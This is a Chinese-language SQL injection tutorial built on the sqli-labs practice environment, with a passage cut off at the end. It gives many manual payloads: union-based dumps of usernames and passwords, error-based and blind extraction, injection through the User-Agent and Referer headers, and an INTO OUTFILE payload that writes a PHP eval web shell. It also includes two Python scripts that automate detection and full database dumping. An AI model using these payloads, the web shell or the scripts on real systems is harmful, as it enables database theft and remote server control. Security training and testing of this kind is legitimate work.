Python应用04_自动sql注入攻击
目录
information_schema数据库:
注入流程:
1. 字符型:需要闭合
2.数字型:不需要闭合
3.字符型,加括号
4.字符型,加括号,双引号
5.盲注,有报错信息,无数据显示
5.1单引号
5.2双引号
5.3时间盲注
7.写入文件注入 lv7
8.表单类型,POST请求,数字型
9.双引号闭合
10.POST盲注
11.header的User-Agent注入
12.header的Referer注入
自动注入:盲注
自动注入+盲注
注意事项:union 联合查询会对查询结果自动去重,若不需要去重,在 union 后面加上 all 即可;另外 union 两侧 select 的列数必须相同,否则直接报错,所以联合注入前要先用 order by 判断列数
ORDER BY n 判断列数:n 大于结果列数时 MySQL 报 Unknown column 'n' in 'order clause',从小到大试 n,最后一个不报错的 n 就是列数
SELECT table_name FROM information_schema.tables ORDER BY 3   -- 只查了 1 列,ORDER BY 3 会报错
information_schema数据库:
关键表:
SCHEMATA 表:提供了当前 MySQL 中所有数据库的信息
TABLES 表:提供了当前 MySQL 中所有数据表的信息
COLUMNS 表:提供了当前 MySQL 中所有字段的信息
注入流程:
1.测试正确的语句
2.测试闭合语句:
1'  1"  1')  1")  1'))  1"))  多数情况下测试这 6 种闭合就差不多了
sql语句中,单引号可以包含双引号如
'123"被包含"456'
3.在闭合语句后面写 and 1 或 and 0,测试后台是否把我们的输入当成 SQL 语句执行了(and 1 时页面正常、and 0 时页面变化,说明条件被执行)
4.如果注入点在 INSERT、UPDATE 语句里,select 的结果不会显示在页面上,应改用 updatexml、extractvalue 函数报错把数据带出来
1. 字符型:需要闭合
报错信息:输入 ?id=3' --> 3'LIMIT 0,1
payload:?id=3' and 1=1 %23
?id=-1' union select 1,table_name,column_name from information_schema.columns where table_name='users'%23
?id=-1' union SELECT 1,user(),(concat(database(),'----'))%23
?id=-1' union SELECT 1,user(),concat(database(),'----',version())%23
?id=-1' union SELECT 1,user(),(concat(database(),'----',version()))%23
?id=-1' union SELECT 1,2,updatexml(1,concat(0x7e,version()),0)%23
?id=-1' union SELECT 1,2,extractvalue(1, concat(0x7e, VERSION()))%23
-- 注意:闭合用英文单引号 ',中文弯引号 ‘ ’ 不会被当作引号;GET 参数里注释符要写成 %23,直接写 # 会被浏览器当成 URL 片段而不发给服务器;报错函数后面同样要注释掉原语句剩下的 ' LIMIT 0,1,否则先报语法错误而不是 XPath 错误
-- updatexml 和 extractvalue 的报错信息最多只显示 32 个字符,需要用 substr 分多次获取,再拼接起来
group_concat:将所有结果拼接成一行;substr(str, pos, len):截取字符串,仅获取从第 pos 个字符起的 len 个字符
SELECT updatexml(1, concat(0x7e, substr((SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES), 1, 32)), 1);   -- 第 1 段
SELECT updatexml(1, concat(0x7e, substr((SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES), 33, 32)), 1);  -- 第 2 段,依此类推
2.数字型:不需要闭合
报错信息:
输入 ?id=1
select 字段名,字段名,字段名 from 数据库.表名 where 条件xxx
?id=-1 union select 1,database(),version() LIMIT 0,2%23
?id=-1 union select 1,table_name,column_name from information_schema.columns where table_name='users'%23
#查询数据库
?id=-1 union select 1,database(),2 %23 -- 数据库结果为:security
#查询表名
?id=-1 union select 1,TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA='security' limit 3,1 -- 1 表名结果为users
#查询列名
?id=-1 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 1,1-- 1 列名结果为username
?id=-1 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 2,1-- 1 列名结果为password
#查询表的内容
?id=-1 union select 1,username,password from security.users limit 1,1 -- 1
3.字符型,加括号
报错信息:输入 ?id=1' --> 1'') LIMIT 0,1    闭合方式:1') or 1=1
payload: ?id=1') and 1=1 %23
?id=1') union select 1,database(),version() LIMIT 1,2 %23
4.字符型,加括号,双引号
报错信息:输入 ?id=1" --> 1"") LIMIT 0,1    闭合方式:1") or 1=1%23
payload: ?id=1") and 1=1 %23
?id=-1") union select 1,3,2%23
5.盲注,有报错信息,无数据显示
5.1单引号
报错信息:
?id=1 --> 显示内容:You are in...........
?id=1' --> 报错: '1'' LIMIT 0,1
?id=1' and 1=1 %23 --> 没有报错,显示内容:You are in...........
?id=1' and 1=2 %23 --> 没有报错,无任何内容显示
由以上得知,注入的语句实际上已经被执行了:条件为真时返回不为空,条件为假时返回为空;页面不显示查询数据,只能靠真/假两种页面的差异逐位猜数据
payload:?id=1' and length(database())>2 %23
注意:闭合用的必须是英文单引号 ',中文弯引号 ’ 不会被 MySQL 当作引号
使用布尔盲注进行注入:
-- 盲注常用函数:
substr: 查找字符串中的子串 取第1个字符:substr(str,1,1) 取第2个字符:substr(str,2,1) 取第3个字符:substr(str,3,1)
ascii: 将字符转换为ascii码
right: 取字符串右边子串
left: 取字符串左边子串
length:求字符串长度
#查询数据库名称
# 查询数据库名称的长度
-- length 判断长度:条件为真时页面有内容,为假时没有;从小到大尝试,直到页面有返回,就找到了真正的长度
?id=1' and length(database())>2 %23
重复 n 次,直到返回 "You are in..........." 时结束,得到正确结果(也可以用 > / < 二分缩小范围,减少请求次数)
# 查询数据库名称
?id=1' and ascii(substr(database(),1,1))=115 %23   -- 115 是字符 s 的 ASCII 码
?id=1' and substr(database(),1,1)<'s' %23
重复操作长度次数,得到数据库名称:security
#查询数据表名称
#查询有多少张表:count() 返回结果行数,可用于盲注时判断有多少行
select count(table_name) from information_schema.tables where table_schema=database();
#查询当前数据库的所有数据表
#查询所有表名的长度(包括group_concat的',')
?id=1' and length( (select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES+where+table_schema=database()) )+=+29+ --+
#查询第一个表(limit 0,1 是第 1 行,limit 1,1 是第 2 行,注意偏移从 0 开始)
1' and substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),1,1) ='u'%23
重复操作
#查询第二个表
1' and substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1) ='u'%23
重复操作
#查询第三个表
1' and substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 2,1),1,1) ='u'-- 1
重复操作,得到表名 'users'(security 库的 4 张表依次是 emails、referers、uagents、users,所以 users 对应的是 limit 3,1)
#查询所有表
Less-1/?id=1' union select 1,(SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES where table_schema=database()),2 limit 1,1--+
#查询列名称
select column_name from information_schema.columns where table_schema='security';
1' and substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA=database() limit 1,1),1,1) ='u'-- 1
重复操作,得到列名称 'username'...(加上 TABLE_SCHEMA 限制,避免其他库里同名表的列混进来)
#查询数据
1' and substr((select username from security.users limit 1,1),1,1) ='u'%23
重复操作,最终得到想要的数据
5.2双引号
错误信息:
?id=1 显示内容:You are in ......
?id=1" and 1=0 %23 不显示任何信息
?id=1" and 1=1 %23 显示内容:You are in ......
5.3时间盲注
if(a,b,c):如果 a 成立,则执行 b,否则返回 c;时间盲注看的是响应延迟(这里约 5 秒),不依赖页面内容,页面真假都一样时也能用
1' and if((length(database())=2),sleep(5),null)%23
7.写入文件注入 lv7
错误信息:
?id=1' %23              --> You have an error in your SQL syntax
?id=1                   --> You are in.... Use outfile......
?id=1" %23              --> You are in.... Use outfile......
?id=1" and 1=1 %23      --> You are in.... Use outfile......
?id=1" and 1=0 %23      --> You are in.... Use outfile......
?id=1 afkashfklkldjhasld --> You are in.... Use outfile......
只会提取id中的有效数字,应该是做了处理。例如:输入1xxx,只会接收1,输入12xxx,只会接收12,输入1"xxcx也是只会接收1。
继续测试,此时应该考虑加括号
?id=1')%23   --> You have an error in your SQL syntax
?id=1")%23   --> You have an error in your SQL syntax
?id=1"))%23  --> You have an error in your SQL syntax
?id=1'))%23  --> You are in.... Use outfile......
最终成功的测试?id=1'))%23可以闭合语句
payload:?id=1')) union select 1,2,3 %23
通过 payload 写入一句话木马到服务器
通过写入文件的方式传入 webshell,使用的是 select '内容' into outfile '路径'
输入:1')) union (select 1,2,'<?php隔@隔e隔val($_P隔O隔S隔T["test"]?>' into outfile 'C:/phpStudy/PHPTutorial/WWW/sqli/123.php') -- 1
- 需要 MySQL 允许写文件:secure_file_priv 为空字符串表示不限制目录,为 NULL 表示禁止导入导出,为某个目录则只能写到该目录下;在 my.ini 的 [mysqld] 下设置 secure_file_priv= 后重启生效。另外连接数据库的账号要有 FILE 权限,mysqld 进程要对目标目录有写权限,而且 into outfile 不会覆盖已存在的文件
- 需要知道目标服务器上网站目录的绝对路径,所以通常会先尝试常见的默认安装路径(如本例 phpStudy 的 WWW 目录),或从报错信息里获取
// 包含的是 php 的脚本,会被作为 php 代码执行
<?php ... ?>
// 表示忽略错误或者警告信息执行后面的指令
@
// 服务器执行后面传入的指令
eval(cmd)
// 服务器接收到的用户输入的 post 参数组成的字典
$_POST
// 用户通过 POST 方式传入的键为 test 的值
$_POST["test"]
// 强制执行用户通过post的方式传入的名为 test 的指令
<?php @eval($_POST["test"]); ?>
8.表单类型,POST请求,数字型
uname=账号内容 passwd=密码内容(POST 表单,参数在请求体里,不在 URL 上)
payload = uname=' union select 1,2,3 %23&passwd=admin
payload = uname=admin&passwd=' union select 1,2,3 %23
9.双引号闭合
正确的输入:uname=admin&passwd=admin
测试输入:uname=admin&passwd=admin
输入:uname=admin"))#&passwd=admin 报错: )#") and password=("admin") LIMIT 0,1,可以推测源码是: username=("输入内容") and password=("输入内容") LIMIT 0,1
payload:uname=admin") union select 1,2#&passwd=admin
10.POST盲注
payload: uname=admin' and length(version())=6#&passwd=admin
payload: uname=admin") and length(version())=6 #&passwd=admin
11.header的User-Agent注入
当页面显示:你的当前IP地址为:xxxxx 时,说明网站读取了请求头并把它存进了数据库
原理:服务端把请求头里的 User-Agent 写入数据库(INSERT),之后再查出来显示;注入点在 INSERT 语句里,页面不回显 select 结果,所以用 updatexml 报错把数据带出来
payload:在 HackBar 插件中,输入正确的账户密码,点击 ADD HEADER 添加 User-Agent 字段,设置值为:' and updatexml(1,concat(0x7e, version()),1),'','') #
(后面的 ,'','' 应是用来补齐 INSERT 剩余的字段数;请求头的值不会做 URL 解码,所以注释符要直接写 #,不能写 %23)
12.header的Referer注入
原理:服务端把请求头里的 Referer 写入数据库,之后再查出来显示,注入方式和 User-Agent 相同
payload:在 HackBar 插件中,输入正确的账户密码,点击 ADD HEADER 添加 Referer 字段,设置值为:' and updatexml(1,concat(0x7e, version()),1),'','') #
双注入
count():分组计数,配合 group by 使用
rand(n):接收随机数种子,生成 0~1 之间的浮点数;种子固定时生成的序列也固定
floor(rand(0)*2):向下取整得到 0 或 1,rand(0) 的序列固定为 0,1,1,0,1,1...;对它 group by 时会因为重复键插入临时表而报错,报错信息里带出 concat 拼接的数据
edge浏览器
User-Agent 的信息被添加到了数据库,所以可以在该头部注入
请求头里的值不会做 URL 解码,%23 不会变成 #,注释符要直接写 #(或 -- 加空格)
Cookie 数据也被添加到了数据库,同样可以作为注入点
测试 sqlmap 是否安装成功
在 sqlmap 所在目录打开控制台,执行 python sqlmap.py --version
自动注入:联合查询(下面这个脚本实现的是 union 联合查询注入;布尔盲注在后面的"自动注入+盲注"脚本里)
from prettytable import PrettyTable
import HackRequests
from bs4 import BeautifulSoup
import re
import time
#1.判断能否注入以及注入类型
# --- 1. Probe set used to detect whether the id parameter is injectable ---
# Index i in every list below stands for the same closing style:
#   0 numeric, 1 ', 2 '), 3 ')), 4 ", 5 "), 6 "))
Type = 0  # index of the closing style the detection loop settles on

# Baseline probes: the plain request, then each closer followed by a comment.
dic1 = [
    '?id=1',
    '?id=1\'+--+',
    '?id=1\')+--+1',
    '?id=1\'))+--+',
    '?id=1"+--+',
    '?id=1")+--+',
    '?id=1"))+--+',
]

# Closer prefixes that a boolean condition is appended to: "and 1" (true probe)
dic2 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']
palyload2 = 'and+1+--+'

# ... and "and 0" (false probe); same prefixes, separate list object.
dic3 = list(dic2)
palyload3 = 'and+0+--+'

# url = 'http://192.168.213.130/sqli-labs/Less-{}/'
# url = input('>>输入url')
# Browser-looking headers; every value but the User-Agent is left empty.
_ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'
headers = {name: '' for name in (
    'accept', 'accept-encoding', 'accept-language', 'cache-control', 'cookie',
    'referer', 'sec-fetch-dest', 'sec-fetch-mode', 'sec-fetch-site', 'sec-fetch-user')}
headers['user-agent'] = _ua
url = 'http://192.168.213.130/sqli-labs/Less-1/'
# url = input('输入url')
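# Fetch the landing page once; a <form method="post"> means the target takes
# its input via POST, which this script does not handle.
res = HackRequests.http(url, headers=headers)
post = re.findall('.*?form.*?method="post"', res.text())
if post == []:
    # Try each closing style: the target is injectable with closer i when the
    # "and 1" probe renders the same page as the plain request while the
    # "and 0" probe renders a different one.
    for i in range(7):
        url1 = url + dic1[i]
        url2 = url + dic2[i] + palyload2
        url3 = url + dic3[i] + palyload3
        res1 = HackRequests.http(url1, headers=headers)
        res2 = HackRequests.http(url2, headers=headers)
        res3 = HackRequests.http(url3, headers=headers)
        if res2.text() == res1.text() != res3.text():
            Type = i
            break
    else:
        # No closer produced a boolean difference: report and stop here instead
        # of falling through to the query menu with a meaningless Type=0.
        print('')
        table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
        table.add_row([url, '否', '-------', '不能使用联合查询', 'Get'])
        print(table)
        exit()
else:
    print('')
    print('Post型请使用其他程序')
    exit()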
#2.测试联合点
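def TestUnion(palyloadType, param, union='', bPrint=True, bPrint2=True):
    """Find a UNION display column and read `param` through it.

    Step 1 probes `union select 9991236987,9992236987,...` with 1..9 columns
    until the page echoes one of the markers; that gives the column count
    (NumSum) and the first column the page renders (ShowNum).  Step 2 puts
    `concat(999,param,236987)` into that column, appends the caller's
    FROM/WHERE tail, and returns the echoed text split on ','.

    palyloadType: closer prefix such as "?id=1'+" (dic2[Type]).
    param:        expression to read, normally a group_concat(...) call; its
                  argument is used as the printed column header.
    union:        URL-encoded tail appended after the select list ('' for none).
    bPrint:       print the result table.
    bPrint2:      print the "injectable" summary table (only if bPrint too).
    Returns the list of values, or [] when no display column was found or the
    page did not echo the markers (the original returned None here, which
    made callers that iterate the result crash).
    """
    marker_end = '236987'
    select_list = ''
    NumSum = 0
    for i in range(1, 10):
        cell = '999{}'.format(i) + marker_end
        select_list = cell if i == 1 else select_list + ',' + cell
        palyload = 'union+select+{}+limit+1,1--+'.format(select_list)
        resUion = HackRequests.http(url + palyloadType + palyload, headers=headers)
        # Any marker that survives tells us which column(s) the page renders.
        ShowNums = re.findall(r'999(.*?)236987', resUion.text())
        if ShowNums != []:
            NumSum = i
            if bPrint == True and bPrint2 == True:
                print('')
                table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
                table.add_row([url, '是', palyloadType + palyload2, '联合查询', 'Get'])
                print(table)
            break
    else:
        # Nine column counts tried without an echo: report and give up on UNION.
        print('')
        table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
        table.add_row([url, '是', palyloadType + palyload2, '不能使用联合查询', 'Get'])
        print(table)
        print('')
        return []

    ShowNum = int(ShowNums[0])
    # Build the select list: the display column carries the wrapped param,
    # every other column is a literal 1.  The ShowNum test comes first so a
    # display column of 1 works too (the original tested i == 1 first and
    # never placed the param in that case).
    cells = []
    for i in range(1, NumSum + 1):
        if i == ShowNum:
            cells.append('concat(999,{},236987)'.format(param))
        else:
            cells.append('1')
    select_list = ','.join(cells)
    if union == '':
        palyload = 'union+select+{}+limit+1,1--+'.format(select_list)
    else:
        palyload = 'union+select+{}+'.format(select_list) + union + '+limit+1,1+--+'
    resUion = HackRequests.http(url + palyloadType + palyload, headers=headers)
    Context = re.findall(r'999(.*?)236987', resUion.text())
    if Context == []:
        # markers not echoed (e.g. the tail errored): nothing to parse
        return []
    values = Context[0].split(',')
    # Column header: the group_concat argument when there is one, else the
    # expression itself (the original indexed an empty match list here).
    header = re.findall(r'group_concat\((.*?)\)', param)
    table = PrettyTable([header[0] if header else param, ])
    for value in values:
        table.add_row([value, ])
    if bPrint == True:
        print(table)
    return values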
#4.解析页面信息,获取查询结果
def n1():
    """Menu option 1: read and print the current database name."""
    # the '+' before ')' decodes to a space, which MySQL ignores
    expr = 'group_concat(database()+)'
    TestUnion(dic2[Type], expr)
def n2():
    """Menu option 2: read and print version()."""
    TestUnion(dic2[Type], 'group_concat(version())')
def n3():
    """Menu option 3: list the tables of the current database."""
    tail = 'FROM+information_schema.tables+WHERE+table_schema+=database()'
    # lab result: ['emails,referers,uagents,users']
    TestUnion(dic2[Type], 'group_concat(table_name)', tail)
def n4(name='', bPrint=True, bPrint2=True):
    """Menu option 4: list the columns of table `name` (prompted when empty).

    Returns whatever TestUnion returns (the column names as a list).
    """
    if name == '':
        name = input('\n请输入需要查询的表名\n')
    # e.g. emails -> ['id,email_id']
    tail = 'FROM+information_schema.columns+WHERE+table_schema+=database()+and+table_name=\'{}\''.format(name)
    return TestUnion(dic2[Type], 'group_concat(column_name)', tail, bPrint, bPrint2)
def n5():
    """Menu option 5: dump one column of one table (both names prompted)."""
    table_name = input('\n请输入需要查询的表名\n')
    column_name = input('\n请输入需要查询的列名\n')
    TestUnion(dic2[Type], 'group_concat({})'.format(column_name), 'FROM+{}+'.format(table_name))
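# Interactive menu: each option issues one or more UNION reads through
# TestUnion.  Loops until the process is killed (there is no quit option).
_menu = ('\n请输入\n'
         '1:查询数据库\n'
         '2:查询数据库版本\n'
         '3:查询表格\n'
         '4:查询列名\n'
         '5:查询内容\n'
         '6:查询指定表格所有内容\n')
_actions = {1: n1, 2: n2, 3: n3, 4: n4, 5: n5}
while True:
    try:
        num = int(input(_menu))
    except ValueError:
        # non-numeric input used to raise out of the loop; just re-prompt
        continue
    if num in _actions:
        _actions[num]()
    elif num == 6:
        # Dump every column of one table: list the columns quietly, then read
        # each one.  n4 may return None when the read fails, so guard it.
        name = input('\n请输入需要查询的表名\n')
        for column in n4(name, False) or []:
            union = 'FROM+{}+'.format(name)
            NeiRong = 'group_concat({})'.format(column)
            TestUnion(dic2[Type], NeiRong, union, bPrint2=False)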
自动注入+盲注
from prettytable import PrettyTable
import HackRequests
from bs4 import BeautifulSoup
import re
import time
#1.判断能否注入以及注入类型
# --- 1. Probe set used to detect whether the id parameter is injectable ---
# Index i in every list below stands for the same closing style:
#   0 numeric, 1 ', 2 '), 3 ')), 4 ", 5 "), 6 "))
Type = 0  # index of the closing style that statr() settles on

# Baseline probes: the plain request, then each closer followed by a comment.
dic1 = [
    '?id=1',
    '?id=1\'+--+',
    '?id=1\')+--+1',
    '?id=1\'))+--+',
    '?id=1"+--+',
    '?id=1")+--+',
    '?id=1"))+--+',
]

# Closer prefixes that a boolean condition is appended to: "and 1" (true probe)
dic2 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']
palyload2 = 'and+1+--+'

# ... and "and 0" (false probe); same prefixes, separate list object.
dic3 = list(dic2)
palyload3 = 'and+0+--+'

# url = 'http://192.168.213.130/sqli-labs/Less-{}/'
# url = input('>>输入url')
# Browser-looking headers; every value but the User-Agent is left empty.
_ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'
headers = {name: '' for name in (
    'accept', 'accept-encoding', 'accept-language', 'cache-control', 'cookie',
    'referer', 'sec-fetch-dest', 'sec-fetch-mode', 'sec-fetch-site', 'sec-fetch-user')}
headers['user-agent'] = _ua
url = 'http://192.168.213.130/sqli-labs/Less-1/'
# url = input('输入url')
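def statr():
    """Detect whether the GET parameter is injectable and which closer it needs.

    Fetches the page once to reject POST forms, then for each closing style i
    (see dic1/dic2/dic3) requests the plain probe, an "and 1" probe and an
    "and 0" probe; the target is injectable with closer i when the first two
    responses are identical and the third differs.  Sets the module global
    Type to the matching index.

    Returns True when a closer was found, False when none matched (the
    "not injectable" summary table is printed in that case; the original
    returned None either way).  Exits the process on a POST form, as before.
    """
    global Type
    res = HackRequests.http(url, headers=headers)
    post = re.findall('.*?form.*?method="post"', res.text())
    if post != []:
        print('')
        print('Post型请使用其他程序')
        exit()
    for i in range(7):
        res1 = HackRequests.http(url + dic1[i], headers=headers)
        res2 = HackRequests.http(url + dic2[i] + palyload2, headers=headers)
        res3 = HackRequests.http(url + dic3[i] + palyload3, headers=headers)
        # boolean difference: "and 1" keeps the page, "and 0" changes it
        if res2.text() == res1.text() != res3.text():
            Type = i
            return True
    print('')
    table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
    table.add_row([url, '否', '-------', '不能使用联合查询', 'Get'])
    print(table)
    return False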
#2.测试联合点
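def TestUnion(palyloadType, param, union='', bPrint=True, bPrint2=True):
    """Find a UNION display column and read `param` through it.

    Step 1 probes `union select 9991236987,9992236987,...` with 1..9 columns
    until the page echoes one of the markers; that gives the column count
    (NumSum) and the first column the page renders (ShowNum).  Step 2 puts
    `concat(999,param,236987)` into that column, appends the caller's
    FROM/WHERE tail, and returns the echoed text split on ','.

    palyloadType: closer prefix such as "?id=1'+" (dic2[Type]).
    param:        expression to read, normally a group_concat(...) call; its
                  argument is used as the printed column header.
    union:        URL-encoded tail appended after the select list ('' for none).
    bPrint:       print the result table.
    bPrint2:      print the "injectable" summary table (only if bPrint too).
    Returns the list of values, or [] when no display column was found or the
    page did not echo the markers (the original returned None here, which
    made callers that iterate the result crash).
    """
    marker_end = '236987'
    select_list = ''
    NumSum = 0
    for i in range(1, 10):
        cell = '999{}'.format(i) + marker_end
        select_list = cell if i == 1 else select_list + ',' + cell
        palyload = 'union+select+{}+limit+1,1--+'.format(select_list)
        resUion = HackRequests.http(url + palyloadType + palyload, headers=headers)
        # Any marker that survives tells us which column(s) the page renders.
        ShowNums = re.findall(r'999(.*?)236987', resUion.text())
        if ShowNums != []:
            NumSum = i
            if bPrint == True and bPrint2 == True:
                print('')
                table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
                table.add_row([url, '是', palyloadType + palyload2, '联合查询', 'Get'])
                print(table)
            break
    else:
        # Nine column counts tried without an echo: report and give up on UNION.
        print('')
        table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
        table.add_row([url, '是', palyloadType + palyload2, '不能使用联合查询', 'Get'])
        print(table)
        print('')
        return []

    ShowNum = int(ShowNums[0])
    # Build the select list: the display column carries the wrapped param,
    # every other column is a literal 1.  The ShowNum test comes first so a
    # display column of 1 works too (the original tested i == 1 first and
    # never placed the param in that case).
    cells = []
    for i in range(1, NumSum + 1):
        if i == ShowNum:
            cells.append('concat(999,{},236987)'.format(param))
        else:
            cells.append('1')
    select_list = ','.join(cells)
    if union == '':
        palyload = 'union+select+{}+limit+1,1--+'.format(select_list)
    else:
        palyload = 'union+select+{}+'.format(select_list) + union + '+limit+1,1+--+'
    resUion = HackRequests.http(url + palyloadType + palyload, headers=headers)
    Context = re.findall(r'999(.*?)236987', resUion.text())
    if Context == []:
        # markers not echoed (e.g. the tail errored): nothing to parse
        return []
    values = Context[0].split(',')
    # Column header: the group_concat argument when there is one, else the
    # expression itself (the original indexed an empty match list here).
    header = re.findall(r'group_concat\((.*?)\)', param)
    table = PrettyTable([header[0] if header else param, ])
    for value in values:
        table.add_row([value, ])
    if bPrint == True:
        print(table)
    return values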
#4.解析页面信息,获取查询结果
def n1():
    """Menu option 1: read and print the current database name (security in the lab)."""
    # the '+' before ')' decodes to a space, which MySQL ignores
    TestUnion(dic2[Type], 'group_concat(database()+)')
def n2():
    """Menu option 2: read and print version() (5.5.53 in the lab)."""
    expr = 'group_concat(version())'
    TestUnion(dic2[Type], expr)
def n3():
    """Menu option 3: list the tables of the current database."""
    # lab result: ['emails,referers,uagents,users']
    tail = 'FROM+information_schema.tables+WHERE+table_schema+=database()'
    TestUnion(dic2[Type], 'group_concat(table_name)', tail)
def n4(name='', bPrint=True, bPrint2=True):
    """Menu option 4: list the columns of table `name` (prompted when empty).

    Returns whatever TestUnion returns (the column names as a list).
    """
    if name == '':
        name = input('\n请输入需要查询的表名\n')
    # e.g. emails -> ['id,email_id']
    tail = 'FROM+information_schema.columns+WHERE+table_schema+=database()+and+table_name=\'{}\''.format(name)
    return TestUnion(dic2[Type], 'group_concat(column_name)', tail, bPrint, bPrint2)
def n5():
    """Menu option 5: dump one column of one table (both names prompted)."""
    table_name = input('\n请输入需要查询的表名\n')
    column_name = input('\n请输入需要查询的列名\n')
    TestUnion(dic2[Type], 'group_concat({})'.format(column_name), 'FROM+{}+'.format(table_name))
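def union():
    """Interactive UNION menu; loops until the process is killed (no quit option).

    Options 1-5 map onto n1..n5; option 6 lists a table's columns quietly and
    then reads every column through TestUnion.
    """
    menu = ('\n请输入\n'
            '1:查询数据库\n'
            '2:查询数据库版本\n'
            '3:查询表格\n'
            '4:查询列名\n'
            '5:查询内容\n'
            '6:查询指定表格所有内容\n')
    actions = {1: n1, 2: n2, 3: n3, 4: n4, 5: n5}
    while True:
        try:
            num = int(input(menu))
        except ValueError:
            # non-numeric input used to raise out of the loop; just re-prompt
            continue
        if num in actions:
            actions[num]()
        elif num == 6:
            name = input('\n请输入需要查询的表名\n')
            # n4 may return None when the read fails; don't crash on it
            for column in n4(name, False) or []:
                tail = 'FROM+{}+'.format(name)
                TestUnion(dic2[Type], 'group_concat({})'.format(column), tail, bPrint2=False)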
#盲注-----------------------------------------------------------------------------------------------
def printtitle(palyload):
    """Print the one-row "injectable / boolean blind" summary for a payload."""
    columns = ['url', '是否可注入', '注入paload', '注入类型', '请求方式']
    summary = PrettyTable(columns, )
    summary.add_row([url, '是', palyload, '布尔盲注', 'Get'])
    print('')
    print(summary)
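def GetSchemaLen(palyload0, PalyloadType, max_len=20):
    """Boolean-blind read of length(database()), stored in the global SchemaLen.

    palyload0:    known-true request suffix (e.g. dic2[Type] + palyload2);
                  its response is the "true" reference page.
    PalyloadType: closer prefix such as "?id=1'" that the condition is appended to.
    max_len:      one past the largest length tried (the original hard-coded 20).
    Returns the length found, or None when no value in range(max_len) matched;
    SchemaLen is left unchanged in that case.
    """
    global SchemaLen
    reference = HackRequests.http(url + palyload0, headers=headers).text()
    for i in range(max_len):
        LenghtUrl = url + PalyloadType + '+and+length(database())+=+{}+--+'.format(i)
        time.sleep(0.3)  # pace the requests
        if HackRequests.http(LenghtUrl, headers=headers).text() == reference:
            SchemaLen = i
            return i
    return None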
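def GetSchenaName(palyload0, palyloadType):
    """Boolean-blind read of database(), one character per position.

    Needs SchemaLen (from GetSchemaLen).  For each position 1..SchemaLen every
    character of the candidate set is tested with
    `and substr(database(),pos,1)='c'`; the first one whose response equals
    the known-true reference page is appended to the global SchenaName.
    A position with no match is skipped silently.  Returns SchenaName.
    """
    global SchenaName, SchemaLen
    # Candidate characters, most likely ones first ("security" is the lab's
    # database name, so its letters are tried before the rest of the alphabet).
    charset = 'security_.abcdefghijklmnopqrstuvwxyz1234567890+@'
    # The reference page does not change; fetch it once instead of per probe.
    reference = HackRequests.http(url + palyload0, headers=headers).text()
    title_shown = False
    for pos in range(1, SchemaLen + 1):
        for s in charset:
            palyloadNameNew = palyloadType + 'and+substr(database(),{},1)=\'{}\'--+'.format(pos, s)
            if not title_shown:
                printtitle(palyloadNameNew)
                title_shown = True
            time.sleep(0.3)
            if HackRequests.http(url + palyloadNameNew, headers=headers).text() == reference:
                SchenaName = SchenaName + s
                print(s, end='')
                break
    print('')
    table = PrettyTable(['数据库:'])
    table.add_row([SchenaName])
    print(table)
    return SchenaName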
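def GetTableName(palyload0, palyloadType, SchenaName='database()'):
    """Boolean-blind read of the table names in one schema.

    SchenaName is spliced into the SQL as-is, so pass an expression: the
    default `database()` or a quoted literal such as "'security'".
    Step 1 finds the length of group_concat(TABLE_NAME) by testing
    `length(...) = i` for i = 1, 2, ...; step 2 reads that string one
    character at a time.  The original ran step 2 against database()
    whatever SchenaName was; both steps now use the same schema.
    Returns the names as a list (the group_concat string split on ',').
    """
    # The reference page does not change; fetch it once instead of per probe.
    reference = HackRequests.http(url + palyload0, headers=headers).text()
    where_schema = 'where+table_schema=' + SchenaName
    allLen = 0
    for i in range(1, 10000):
        palyload = palyloadType + 'and+length((select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES+' + where_schema + '))+=+{}+--+'.format(i)
        time.sleep(0.3)
        if HackRequests.http(url + palyload, headers=headers).text() == reference:
            allLen = i
            break
    # Candidate characters; the letters of the lab's table names come first.
    charset = 'emails,rfugntbcdhjkopqvwxyz_123456789@!+'
    strName = ''
    title_shown = False
    for pos in range(1, allLen + 1):
        for s in charset:
            palyload = palyloadType + 'and+substr((select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES+' + where_schema + '),{},1)=\'{}\'--+'.format(pos, s)
            if not title_shown:
                printtitle(palyload)
                title_shown = True
            time.sleep(0.3)
            if HackRequests.http(url + palyload, headers=headers).text() == reference:
                strName = strName + s
                print(s, end='')
                break
        # A position with no matching character is skipped; the original kept
        # retrying the same index for every remaining position.
    names = strName.split(',')
    print('')
    table = PrettyTable([SchenaName])
    for name in names:
        table.add_row([name])
    print(table)
    return names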
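def GetColumns(palyload0, palyloadType, table_name, SchenaName='database()'):
    """Boolean-blind read of the column names of one table.

    table_name and SchenaName are spliced into the SQL as-is, so pass SQL
    expressions (e.g. table_name="'emails'", SchenaName="database()").
    Step 1 finds the column count with `count(column_name) = i`; step 2 reads
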